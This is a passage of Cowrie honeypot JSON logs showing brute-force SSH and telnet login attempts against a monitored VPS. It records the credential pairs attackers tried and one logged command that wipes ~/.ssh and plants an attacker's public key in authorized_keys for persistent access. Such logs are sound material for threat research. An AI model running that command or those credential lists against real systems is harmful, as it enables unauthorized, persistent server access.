03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:18.920916Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.088198Z","src_ip":"212.227.235.229","session":"8210a91779aa"}
{"eventid":"cowrie.login.success","username":"root","password":"avonline","message":"login attempt [root/avonline] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.311135Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:02:19.557412Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.558172Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.559146Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.646608Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:02:19.836422Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.837130Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.924999Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:19.925860Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43310,"dst_ip":"1.2.3.4","dst_port":22,"session":"0097ffbc179d","protocol":"ssh","message":"New connection: 212.227.235.229:43310 (1.2.3.4:22) [session: 0097ffbc179d]","sensor":"my-vps","timestamp":"2025-09-09T02:02:20.009696Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:20.010415Z","src_ip":"212.227.235.229","session":"0097ffbc179d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:20.096713Z","src_ip":"212.227.235.229","session":"0097ffbc179d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:02:20.485010Z","src_ip":"212.227.235.229","session":"0097ffbc179d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:21.573767Z","src_ip":"212.227.235.229","session":"0097ffbc179d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39280,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e197f5a15c","protocol":"ssh","message":"New connection: 212.227.235.229:39280 (1.2.3.4:22) [session: c8e197f5a15c]","sensor":"my-vps","timestamp":"2025-09-09T02:02:21.655315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:21.656128Z","src_ip":"212.227.235.229","session":"c8e197f5a15c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:21.738692Z","src_ip":"212.227.235.229","session":"c8e197f5a15c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:02:22.108996Z","src_ip":"212.227.235.229","session":"c8e197f5a15c"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:22.193430Z","src_ip":"212.227.235.229","session":"c8e197f5a15c"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:22.194251Z","src_ip":"212.227.235.229","session":"9384766e5ecc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47360,"dst_ip":"1.2.3.4","dst_port":22,"session":"432f1bb04054","protocol":"ssh","message":"New connection: 212.227.125.160:47360 (1.2.3.4:22) [session: 432f1bb04054]","sensor":"my-vps","timestamp":"2025-09-09T02:02:39.056115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.11.0","message":"Remote SSH version: SSH-2.0-paramiko_2.11.0","sensor":"my-vps","timestamp":"2025-09-09T02:02:39.981457Z","src_ip":"212.227.125.160","session":"432f1bb04054"}
{"eventid":"cowrie.client.kex","hassh":"a704be057881f0b1d623cd263e477a8b","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-rsa","ssh-dss","ecdsa-sha2-nistp256","ssh-ed25519","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a704be057881f0b1d623cd263e477a8b","sensor":"my-vps","timestamp":"2025-09-09T02:02:40.141444Z","src_ip":"212.227.125.160","session":"432f1bb04054"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48696,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dea1325bc7d","protocol":"ssh","message":"New connection: 212.227.125.160:48696 (1.2.3.4:22) [session: 2dea1325bc7d]","sensor":"my-vps","timestamp":"2025-09-09T02:02:41.591032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.11.0","message":"Remote SSH version: SSH-2.0-paramiko_2.11.0","sensor":"my-vps","timestamp":"2025-09-09T02:02:41.592117Z","src_ip":"212.227.125.160","session":"2dea1325bc7d"}
{"eventid":"cowrie.client.kex","hassh":"a704be057881f0b1d623cd263e477a8b","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a704be057881f0b1d623cd263e477a8b","sensor":"my-vps","timestamp":"2025-09-09T02:02:41.854355Z","src_ip":"212.227.125.160","session":"2dea1325bc7d"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:41.925233Z","src_ip":"212.227.125.160","session":"2dea1325bc7d"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:43.699413Z","src_ip":"212.227.125.160","session":"432f1bb04054"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34136,"dst_ip":"1.2.3.4","dst_port":22,"session":"71f9be7719d3","protocol":"ssh","message":"New connection: 212.227.235.229:34136 (1.2.3.4:22) [session: 71f9be7719d3]","sensor":"my-vps","timestamp":"2025-09-09T02:02:46.767395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:46.768392Z","src_ip":"212.227.235.229","session":"71f9be7719d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:46.992263Z","src_ip":"212.227.235.229","session":"71f9be7719d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34882,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a174a71c970","protocol":"ssh","message":"New connection: 212.227.235.229:34882 (1.2.3.4:22) [session: 4a174a71c970]","sensor":"my-vps","timestamp":"2025-09-09T02:02:47.903183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:02:47.904102Z","src_ip":"212.227.235.229","session":"4a174a71c970"}
{"eventid":"cowrie.login.failed","username":"butter","password":"12345","message":"login attempt [butter/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T02:02:47.928632Z","src_ip":"212.227.235.229","session":"71f9be7719d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:02:48.133146Z","src_ip":"212.227.235.229","session":"4a174a71c970"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"elasticsearch@123","message":"login attempt [elasticsearch/elasticsearch@123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:02:49.094275Z","src_ip":"212.227.235.229","session":"4a174a71c970"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:49.154732Z","src_ip":"212.227.235.229","session":"71f9be7719d3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:02:50.327105Z","src_ip":"212.227.235.229","session":"4a174a71c970"}
{"eventid":"cowrie.session.connect","src_ip":"218.201.87.66","src_port":45582,"dst_ip":"1.2.3.4","dst_port":23,"session":"2fba7af09ef7","protocol":"telnet","message":"New connection: 218.201.87.66:45582 (1.2.3.4:23) [session: 2fba7af09ef7]","sensor":"my-vps","timestamp":"2025-09-09T02:03:01.688822Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37720,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec24c3881523","protocol":"ssh","message":"New connection: 212.227.235.229:37720 (1.2.3.4:22) [session: ec24c3881523]","sensor":"my-vps","timestamp":"2025-09-09T02:03:07.504076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:03:09.104035Z","src_ip":"212.227.235.229","session":"ec24c3881523"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:03:09.105491Z","src_ip":"212.227.235.229","session":"ec24c3881523"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:03:16.592749Z","src_ip":"212.227.235.229","session":"ec24c3881523"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47070,"dst_ip":"1.2.3.4","dst_port":22,"session":"46d24f375abb","protocol":"ssh","message":"New connection: 212.227.235.229:47070 (1.2.3.4:22) [session: 46d24f375abb]","sensor":"my-vps","timestamp":"2025-09-09T02:03:18.307984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:03:18.308873Z","src_ip":"212.227.235.229","session":"46d24f375abb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:03:18.396168Z","src_ip":"212.227.235.229","session":"46d24f375abb"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"Password1","message":"login attempt [administrator/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:03:18.786740Z","src_ip":"212.227.235.229","session":"46d24f375abb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:03:19.875256Z","src_ip":"212.227.235.229","session":"46d24f375abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58052,"dst_ip":"1.2.3.4","dst_port":22,"session":"899e4b07f68a","protocol":"ssh","message":"New connection: 212.227.235.229:58052 (1.2.3.4:22) [session: 899e4b07f68a]","sensor":"my-vps","timestamp":"2025-09-09T02:03:25.588179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:03:25.589800Z","src_ip":"212.227.235.229","session":"899e4b07f68a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-